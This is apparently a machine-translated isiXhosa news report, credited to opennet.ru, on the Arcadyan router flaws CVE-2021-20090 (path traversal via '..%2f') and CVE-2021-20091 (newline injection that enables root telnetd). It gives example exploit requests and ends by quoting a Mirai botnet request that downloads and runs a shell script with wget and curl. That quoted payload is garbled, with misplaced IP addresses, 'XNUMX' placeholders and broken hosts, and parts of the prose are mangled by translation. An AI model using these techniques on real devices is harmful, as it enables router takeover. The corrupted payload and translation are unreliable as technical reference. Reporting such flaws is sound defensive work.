Uhlaselo olukhulu lurekhodwe kwinethiwekhi ngokuchasene neerouter zasekhaya ezine-firmware esebenzisa ukuphunyezwa kweseva ye-HTTP evela kwinkampani yaseArcadyan. Ukufumana ulawulo kwizixhobo, indibaniselwano yobuthathaka obubini isetyenziswa evumela ukuphunyezwa okude kwekhowudi engafanelekanga enamalungelo engcambu. Ingxaki ichaphazela ngokufanelekileyo uluhlu olubanzi lwee-ADSL routers ezivela eArcadyan, ASUS kunye neBuffalo, kunye nezixhobo ezibonelelwa phantsi kweempawu zeBeeline (ingxaki iqinisekisiwe kwi-Smart Box Flash), iDeutsche Telekom, i-Orange, i-O2, iTelus, iVerizon, iVodafone kunye abanye abaqhubi be-telecom. Kuphawulwe ukuba ingxaki ikhona kwi-firmware ye-Arcadyan iminyaka engaphezu kwe-10 kwaye ngeli xesha likwazi ukufudukela ubuncinane kwiimodeli ze-20 zezixhobo ezivela kubakhiqizi abahlukeneyo be-17.
Ubuthathaka bokuqala, i-CVE-2021-20090, yenza kube lula ukufikelela kuyo nayiphi na isikripthi sojongano lwewebhu ngaphandle kokuqinisekiswa. Undoqo wobuthathaka kukuba kujongano lwewebhu, ezinye izikhokelo apho imifanekiso, iifayile zeCSS kunye nezikripthi zeJavaScript zithunyelwa zifikeleleke ngaphandle kokuqinisekiswa. Kule meko, abalawuli apho ufikelelo ngaphandle koqinisekiso luvumelekileyo luyajongwa kusetyenziswa imaski yokuqala. Ukuchaza amagama "../" kwiindlela zokuya kulawulo lomzali kuvaliwe yi-firmware, kodwa ukusebenzisa "..% 2f" indibaniselwano itsibe. Ngoko ke, kuyenzeka ukuba uvule amaphepha akhuselweyo xa uthumela izicelo ezifana ne "http://192.168.1.1/images/..%2findex.htm".
Ubuthathaka besibini, i-CVE-2021-20091, ivumela umsebenzisi oqinisekisiweyo ukuba enze utshintsho kwizicwangciso zenkqubo yesixhobo ngokuthumela iiparamitha ezifomathiweyo ngokukodwa kwiskripthi se-application_abstract.cgi, esingajongi ubukho bomlinganiswa omtsha kwiiparameters. . Ngokomzekelo, xa usenza umsebenzi we-ping, umhlaseli unokucacisa ixabiso elithi "192.168.1.2%0AARC_SYS_TelnetdEnable=1" kwintsimi kunye nedilesi ye-IP ejongwayo, kunye neskripthi, xa udala ifayile yokusetha /tmp/etc/config/ .glbcfg, iyakubhala ilayini βAARC_SYS_TelnetdEnable=1β kuyo ", eyenza iseva ye-telnetd isebenze, enikezela ngofikelelo olungathintelwanga lomyalelo weqokobhe ngamalungelo engcambu. Ngokufanayo, ngokucwangcisa i AARC_SYS iparamitha, ungenza nayiphi na ikhowudi kwisixokelelwano. Ubuthathaka bokuqala kwenza kube lula ukuqhuba isikripthi esinengxaki ngaphandle koqinisekiso ngokufikelela kulo njenge "/images/..%2fapply_abstract.cgi".
Ukusebenzisa ubuthathaka, umhlaseli kufuneka akwazi ukuthumela isicelo kwi-port yenethiwekhi apho ujongano lwewebhu lusebenza khona. Ukuqwalasela i-dynamics yokusasazeka kohlaselo, abaninzi abaqhubi bashiya ukufikelela kwizixhobo zabo kwinethiwekhi yangaphandle ukuze kube lula ukuxilongwa kweengxaki ngenkonzo yokuxhasa. Ukuba ukufikelela kwi-interface kunqunyelwe kuphela kwinethiwekhi yangaphakathi, uhlaselo lunokwenziwa kwinethiwekhi yangaphandle kusetyenziswa "i-DNS rebinding" ubuchule. Ubuthathaka sele busetyenziswa ngokusebenzayo ukudibanisa iirotha kwi-Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Uqhagamshelo: vala i-User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
umthombo: opennet.ru